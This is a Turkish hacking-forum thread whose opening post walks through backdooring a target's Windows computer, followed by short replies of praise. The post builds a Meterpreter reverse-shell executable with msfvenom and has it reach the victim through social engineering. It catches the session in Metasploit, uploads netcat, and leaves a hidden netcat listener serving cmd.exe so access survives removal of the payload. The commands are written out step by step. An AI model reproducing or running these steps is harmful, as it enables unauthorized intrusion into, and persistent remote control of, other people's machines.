Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Trojan ve Virüsler

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.



bilgisayara arka kapi acma olayi/cewl

Trojan ve Virüsler

Anket Sonuçları: konu sabite alinsinmi ?
evet 8 38,10%
hayir 4 19,05%
kesinlike evet 9 42,86%
Katılımcı sayısı: 21. Sizin bu Ankette oy kullanma yetkiniz bulunmuyor

Yeni Konu aç Cevapla
 
Seçenekler
Alt 30-01-2019 17:52   #1
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
06/2017
Nereden
Merdekan
Yaş
24
Mesajlar
Konular

Teşekkür (Etti): 0
Teşekkür (Aldı): 723


bilgisayara arka kapi acma olayi/cewl





Salam Eleykum arkadaslar. bu konuda ise bazan yanlis anladiqimiz bir olayin tam anlamiyl eksiksiz anlatacaqim ki eyer konumu beyenirsenizse sabite alinmasida guzel olur deye dusunuyorm. evet bu backdoor arkakapi anlamin verir olayin anlatiyim kali linuksla genellikle kolaylik acisindan yapilir boyle farkli isler goren farki amaclari olan backdorlar olusdurulur, ve hedef bilgisayara hagise yontemle gonderilir unutmayalim bu konuda en basta gelen isim linuks dur ki 2 ci ismi gelen sey ise arkadaslarin cogunun anladiqi sosial muhednislikdir farkli farkli yontemlerle bu backdoorlar olusdurulur farkli amaclara gore hedefe gonderilir ki ilk once kalide baci araclarin sayesinde olusdurulur backdoorlar en cox kullanilan backdor olusdurma proqrami deye bileceymiz msfvenom dur bu aracla genellikle cok is yapa bilen en onemlisi mimaristini kolaylikla sece bileceymiz farkli sistemler icin backdoorlar olusdura bileceymiz 1 aracdir bneim genellikle backdoor konularmin coku msfvenomda hazirlanmakdadir . evet hedefe gonderdik msfvenom dosdumuzun yapmis olduqu backdooru hedef acdi o virusu backdoru peki biz ne anlayacayiq bu olaydan keni kendimize soyleyeceyikki hedefde 1 arka kapi acdik amma acilmadi bu payload hedef sistemi bize balayan bir backdoor dur ki bunu ben arkakapi sanmiyorm arka kapi dediyin hedef sildi backdoru ne yapacagiz ? haa bu sohbet var ortada arkadaslar hani bizde backdor vardi ? ureymiz isdediyi zaman hedefden dosya transfrei yapa biliyorduk hedef sildi o payloadi amma bizim erisim kesildi o uzdende bu konunu dikkatla okumanizi tavsiyye ederim kecelim kali linuksa bu gun yapacaqmiz islem bir payload olusdurup hedefin bilgisayarna atmak ve bu bilgisayara sizarak bi proqrami calismasin salamak eyer biz bunu yaparsak bu bilgisayarin sahibi anladiqi zaman ki sisteminde 1 payload var silecekdir amma bize fark etmez biz o sistemde arka kapi acmisik kulaqa hos gelyor dimi dun gozme bir sey deydi ismi nc.exe bunu indirmek icin ise googleye nc.exe downoad yazip kalimize windows surumun ilk sayfadaki ve 2 ci 1.12 ci surumu indirmek lazim arkadaslar ve bir aciklama buldum googlede nc.exe biliyordum aciklamasin ne ise yaradiqini amma birde yazayim ki tam anlasimli olsun
nc.exe, NetCat tarafından ağ bağlantılarına yazma ve okuma işlemlerinden sorumlu olan bir işlemdir. Bu Bilgisayar ağı yardımcı programı, sayısız farklı eylemin tamamlanmasına izin veren İletim Denetimi Protokolü'nü (TCP) kullanıyor. NetCat, diğer programlar tarafından yönetilebilen veya doğrudan kullanılabilen bir arka uç olarak kabul edilir. Nc.exe tarafından kullanılan TCP / IP ağ testi için kullanılsa da, yazılım yetenekleri siber suçlular tarafından kötüye kullanılabilir.




ve arkadaslar bu nc.exe yi bide parametrelerine bakalim ilk once biraz sistesinnen bilgi edinelim Port tarama, dışarıdakileri keşfetmek için popüler bir yöntemdir. Netcat komutlarını önce seçeneklerle, sonra hedef ana bilgisayarla kabul eder ve bundan sonraki her şey port isimleri veya sayıları veya MN sözdizimindeki portların aralıkları olarak yorumlanır. CAVEAT: / etc / services içindeki bazı port isimleri tire içeriyor - netcat şu anda bunları doğru şekilde ayrıştırmıyor, bu yüzden eğer yapabilirseniz sayıları kullanarak aralıkları belirtin. Bu yüzden birden fazla port belirtilirse, netcat, hepsine * hepsine * bağlanır ve aynı veri grubunu standart girdiden [8K değerine kadar] başarılı bir şekilde bağlanan her birine gönderir. Birden fazla port belirtmek, reddedilen bağlantılar hakkındaki tanılama mesajlarını da engeller, çünkü -v, “daha ​​fazla ayrıntı” için iki kez belirtilmezse. Bu yolla normalde sadece gerçekten açık bağlantılar hakkında bilgilendirilirsiniz. Örnek: `` nc -v -w 2 -z hedef 20-30 ' 'Hedefteki 20 ila 30 arasında [dahil] tüm bağlantı noktalarına bağlanmayı deneyecek ve muhtemelen yol boyunca bir FTP sunucusu, telnet sunucusu ve posta göndereni hakkında sizi bilgilendirecektir. -Z anahtarı, bir TCP bağlantısına herhangi bir veri gönderilmesini ve UDP bağlantısına çok sınırlı bir prob verisi göndermeyi önler ve bu nedenle yalnızca hedefin hangi bağlantı noktalarını dinlediğini görmek için hızlı bir tarama modu olarak kullanışlıdır. İstenirse tarama hızını sınırlandırmak için, -i her port probu arasına bir gecikme ekleyecektir. Daha sonra tarif edilen UDP taraması ile ilgili bazı tuzaklar vardır, ancak genel olarak iyi çalışır. ve böylece sadece hedefin hangi portlarda dinlediğini görmek için hızlı bir tarama modu olarak kullanışlıdır. İstenirse tarama hızını sınırlandırmak için, -i her port probu arasına bir gecikme ekleyecektir. Daha sonra tarif edilen UDP taraması ile ilgili bazı tuzaklar vardır, ancak genel olarak iyi çalışır. ve böylece sadece hedefin hangi portlarda dinlediğini görmek için hızlı bir tarama modu olarak kullanışlıdır. İstenirse tarama hızını sınırlandırmak için, -i her port probu arasına bir gecikme ekleyecektir. Daha sonra tarif edilen UDP taraması ile ilgili bazı tuzaklar vardır, ancak genel olarak iyi çalışır. Belirtilen her port aralığı için, tarama normalde bu aralıkta aşağı doğru yapılır. -R anahtarı kullanılıyorsa, tarama işlemi bu aralıktaki rasgele atlama yapar ve bunları buldukça açık bağlantı noktalarını bildirir. [Bunların sıraya göre listelenmesini istiyorsanız, `` sort '' ile boru standart hatası ...] Ayrıca, rastgele mod etkinse, yerel kaynak portları da randomize edilir. Bu, netcat'in taramasında herhangi bir düzenli desen göstermesini önler. Kapsamınız için -r ve seçilen port aralıklarını makul şekilde kullanarak taramanız üzerinde oldukça hassas bir kontrol yapabilirsiniz. Tek bir bağlantı için -r kullanırsanız, kaynak portu, çekirdeğin size vereceği bir sonraki değil, 8192'nin üzerinde rasgele bir değere sahip olacaktır. -P ile belirli bir yerel bağlantı noktasının seçilmesinin, yerel bağlantı noktası rasgele seçimlerini geçersiz kıldığını unutmayın.



bu site bilmediklermi aciklamama yardimci oldu

nc yi konsoldan ayralim


Kod:
 -d

NT sürümü için yeni bir özellik, -d veya konsol bayrağından ayırmaktır. Bu, Netcat’ın, ekranı tıkayan veya görev listesinde görünen çirkin bir konsol penceresi olmadan çalışmasını sağlar.


Kod:
  -e file.exe  (İstemci bağlandığında file.exe'yi yürütün)

Yapılması gereken heyecan verici bir şey, -l veya `` listen 'seçeneğini ve -e veya `` execute' seçeneğini kullanarak uzaktaki bir makineye hızlı bir kabuk atmaktır. Bir bağlantı için belirli bir bağlantı noktasında Netcat dinlemeyi çalıştırıyorsunuz. Bir bağlantı yapıldığında, Netcat seçtiğiniz programı yürütür ve programın stdin ve stdout'unu ağ bağlantısına bağlar.


Kod:
  shell> nc -l -p 23 -t-e cmd.exe

Netcat'ın 23 numaralı bağlantı noktasını (telnet) dinlemesini sağlar. Bir müşteri tarafından bağlanıldığında bir kabuk (cmd.exe) ortaya çıkar. -T seçeneği, Netcat'a müşterinin bekleyebileceği herhangi bir telnet anlaşmasını gerçekleştirmesini söyler. Netcat -DGAPING_SECURITY_HOLE ile derlenirse, -e argümanı başarılı bir bağlantı kurduktan veya aldıktan sonra çalıştırılacak bir program belirtir. Dinleme modunda, bu “inetd” e benzer şekilde çalışır, ancak yalnızca tek bir örnek için. BÜYÜK BAKIM ile kullanın. Kodun bu parçası normalde etkin değildir; Ne yaptığını biliyorsan, iyi eğlenceler. Bu hack ayrıca UDP modunda da çalışır. Yalnızca programın adını -e sağlayabileceğinizi, ancak bağımsız değişkenler sağlayamadığınızı unutmayın. Bir argüman listesiyle bir şey başlatmak istiyorsanız, iki satırlık bir sarmalayıcı betiği yazın veya her zamanki gibi inetd kullanın.



Kod:
  -g (Grup atlama sayıları)

Pek çok kişi, kendi güvenlik duvarlarının kaynak yönlendirmeli paketleri engellediğinden emin olmak için bile olsa, IP kaynak yönlendirmesini kullanarak ağ bağlantısını test etmekle ilgilenmektedir. Onu destekleyen sistemlerde, -g anahtarı bağlantınız için gevşek kaynak yönlendirmeli bir yol oluşturmak için birden çok kez [8'e kadar] kullanılabilir ve -G argümanı listedeki "sekme işaretçisini" konumlandırır. Şebekeniz kaynak yönlendirilmiş trafiğe izin veriyorsa, internetteki uzak noktalardan kendi servislerinize olan bağlantıyı test edebilirsiniz. Her ne kadar yeni BSD-flavor telnetleri de kaynak yönlendirme kabiliyetine sahip olsa da, açıkça belgelenmemiş olduğunu ve komut sözdiziminin bir miktar sakar olduğunu unutmayın. Netcat'ın `` -g '' işlemi, `` traceroute '' sonrasında modellenmiştir.



Kod:
 -i # (Gönderilenler arasındaki aralık)  saniyye ile (:


Ağ bağlantısından gelen veriler, büyük 8K okuma ve yazma işlemlerini kullanarak her zaman mümkün olduğu kadar verimli bir şekilde standart çıktıya iletilir. Standart girdi normal olarak ağa aynı şekilde gönderilir, ancak -i anahtarı, bunu yavaşlatan bir '`aralık süresi' 'belirler. Standart girdi hala büyük gruplar halinde okunur, ancak netcat daha sonra satır sonlarının nerede bulunduğunu bulmaya çalışır ve her aralıkta bir satır gönderir. Standart giriş bir terminal ise, verilerin satır satır zaten okunmuş olduğunu unutmayın, bu nedenle -i aralığını çok uzun yapmazsanız, yazdıklarınızın oldukça normal bir hızda dışarı çıkacağını unutmayın. -i, dosyalardan veya borulardan okunanları “ölçmek” istediğinizde gerçekten kullanım için tasarlanmıştır.


Kod:
 -i  (dinleme modu)
ben buraya kadar okudum gerisini siz girip okuyun arkadaslar eee tamam iyi gidyoruz simdi kali linuksu acalim ve terminala msfvenom yazalim



Kod:
  msfvenom


yazdik ve resimdeki gibi bi arayuzu vardir drek parametreler girelim konularimin coksunda vardir payload olusdurma yinede resim ekleymki sayfa deyisip aramayasiniz deye msfvenoma parametreleri girelim bir payload hazir edelim hedefe gonderelim ve islemlere baslayalim arkadaslar asagida parametre ve resmler bulunmakdadir hadi o zaman baslayalim





Kod:
 msfvenom -p windwos/meterpreter/reverse_tcp lhost=192.168.x.x lport=4444 -f exe > /root/Desktop/baslangic.exe



bu asamada payload ana ekrana baslangic.exe payloadini olusdurdu ve varsayalimki hedefe artik gonderdik ve mettasploit konusluna kecelim






Kod:
 msfconsole






Kod:
 use exploit/multi/handler






Kod:
 set payload windows/meterpreter/reverse_tcp






Kod:
 set lhost 192.168.x.x






Kod:
 set lport (acik port)







Kod:
 exploit



bu asamadan sonra varsayalimki hedef backdoru acdi devam edelim






Kod:
 sessions -i (id deyer girilmeli)






Kod:
 sessions -i (id deyer girilmeli)






Kod:
 sessions -i 1 (deyerin 1 olduqunu soyledik)






Kod:
 dir (neredeyiz bilmek icin)






Kod:
 cd .. (biraz geri giddik derinliklere inmemeiz iyi olr






Kod:
 upload '/root/Desktop/nc.exe'



nc.exe indir




Kod:
 shell





Kod:
 dir , pwd (nerededyiz ?)





Kod:
 nc.exe






Kod:
 ipconfig (hedefin ip si ne ?)






Kod:
  -L -p 1414  -e cmd.exe  (port belirlendi)
Kod:
  ctrl c (cikalim artik)






Kod:
 nc ip port (hedefden mettasploitten ipconfig yazarken aldiqimiz ip ve acik postumuz )



haaa arkadaslar artik konunun sonuna ulasdik yernizde olsam drek videonu izlerim kolaylik acisindan anladiz dimi ? mettasploitten hedefe sizarken shell demistik ardinca ise ipconfig yazip hedefin ipsin ele kecirdik nc ip yi portu yazdik selametle (:





___________________________________________

█║▌│█│║▌║││█║▌║▌║
© Copyright 2017
MERDEKAN

Konu cewl tarafından (30-01-2019 17:58 Saat 17:58 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Alt 30-01-2019 17:57   #2
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
08/2018
Nereden
TÜRKİYE
Mesajlar
Konular

Teşekkür (Etti): 4
Teşekkür (Aldı): 5




eline sağlık kardeş emek vermişsin
 Offline  
 
Alıntı ile Cevapla
Alt 30-01-2019 18:02   #3
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
03/2018
Mesajlar
Konular

Teşekkür (Etti): 35
Teşekkür (Aldı): 27




Sonuna kadar okudum Kolaylık acisindan video izleyebilirsiniz demişsiniz ama video kullanılamıyor



___________________________________________

Kod:
İnsanlık ne azaldı ne öldü, elini vicdanına koyduğunda ona ne olmuş anlayacaksın.[
 Offline  
 
Alıntı ile Cevapla
Alt 30-01-2019 18:07   #4
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
07/2016
Mesajlar
Konular

Teşekkür (Etti): 464
Teşekkür (Aldı): 707




Abi söyleycek şey bırakmıyor insana, olası soruları da cevaplamış.
Tek kelimeyle mükemmel, kesinle sabite alınması gerek.


Ellerine sağlık cewl kardeşim



___________________________________________

Anladıktan sonra, hiçbir şey ilginç gelmez.
▓██▓
▓██▒
▒██░
▒██░ awliet123
░██████▒
░ ▒░▓ ░
░ ░ ▒ ░
░ ░

 Offline  
 
Alıntı ile Cevapla
Alt 30-01-2019 18:15   #5
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
06/2017
Nereden
Merdekan
Yaş
24
Mesajlar
Konular

Teşekkür (Etti): 0
Teşekkür (Aldı): 723




Alıntı:
DucKC´isimli üyeden Alıntı Mesajı göster
Sonuna kadar okudum Kolaylık acisindan video izleyebilirsiniz demişsiniz ama video kullanılamıyor
artik kullaniliyor izleye blirsin

Alıntı:
Lawliet123´isimli üyeden Alıntı Mesajı göster
Abi söyleycek şey bırakmıyor insana, olası soruları da cevaplamış.
Tek kelimeyle mükemmel, kesinle sabite alınması gerek.


Ellerine sağlık cewl kardeşim
canm law sana tesekur ederim bu hack isinden anlayan arkadaslar bilseki bu ne kadar yararli bi konu bu konudan disari cikmazlar dosdum (;



___________________________________________

█║▌│█│║▌║││█║▌║▌║
© Copyright 2017
MERDEKAN
 Offline  
 
Alıntı ile Cevapla
Alt 30-01-2019 18:24   #6
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
03/2018
Nereden
Red Square
Mesajlar
Konular

Teşekkür (Etti): 257
Teşekkür (Aldı): 183




Çok güzel eline sağlık Linux konularının devamını bekliyoruz



___________________________________________

█▓ ☾✯ ▓█ATATÜRK'ÜN TORUNU █▓ ☾✯ ▓█
Ben Vatanseverliği Atatürk'ten,
Halkçılığı Tito'dan,
Yenilikçiliği Che'den,
Milliyetçiliği Ecevit'ten,
Hackerliği ise Solo-Türk'ten öğrendim.
Benim karşımda kimse duramaz !


 Online  
 
Alıntı ile Cevapla
Alt 30-01-2019 18:29   #7
  • Bilgi Teknolojileri Ekibi
  • Üye Bilgileri
Üyelik tarihi
11/2015
Nereden
/etc/passwd
Yaş
18
Mesajlar
Konular

Teşekkür (Etti): 20
Teşekkür (Aldı): 70




Eline Emeğine Sağlık Cewl Başarılarının Devamını Dilerim



___________________________________________

Uykunun En Güzel Yerinde Çalan Alarm Gibiyim.
Rüzgardan Yüzüne Gelen O Lanet Fular Gibiyim.
Sinirlenip Yumrukladığın Beyaz Duvar Gibiyim.
Sana Zarar Veririm Anlayacağın Kumar Gibiyim.
 Offline  
 
Alıntı ile Cevapla
Alt 30-01-2019 18:31   #8
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
04/2016
Nereden
root@kali:~#
Yaş
88
Mesajlar
Konular

Teşekkür (Etti): 3967
Teşekkür (Aldı): 1507




Emek kokuyor. düşük ihtimal ama ilgi görür umarım.

Eline emeğine sağlık cewl



___________________________________________

...
 Offline  
 
Alıntı ile Cevapla
Alt 30-01-2019 18:31   #9
  • Üsteğmen
  • Üye Bilgileri
Üyelik tarihi
12/2018
Nereden
Bilinmiyor
Mesajlar
Konular

Teşekkür (Etti): 18
Teşekkür (Aldı): 57




dostum çok yararlı bir konu eline emeğine sağlık backdoor da arka kapı için uygun bir araç



___________________________________________

Türk olmak zordur.Dünya ile savaşırsın.
Türk olmamak daha zordur.Türk ile savaşırsın.

Software Developer & Cyber Security

 Offline  
 
Alıntı ile Cevapla
Alt 30-01-2019 18:32   #10
  • Üsteğmen
  • Üye Bilgileri
Üyelik tarihi
09/2018
Nereden
MilkyWayGlxy
Mesajlar
Konular

Teşekkür (Etti): 16
Teşekkür (Aldı): 94




Abi konu harika olmuş herşeyin detayına inmişsine
Eline emeğine sağlık



___________________________________________

TÜRK HACK TEAM

 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Siber Güvenlik
Pomeranian Boo
instagram takipci hilesi

wau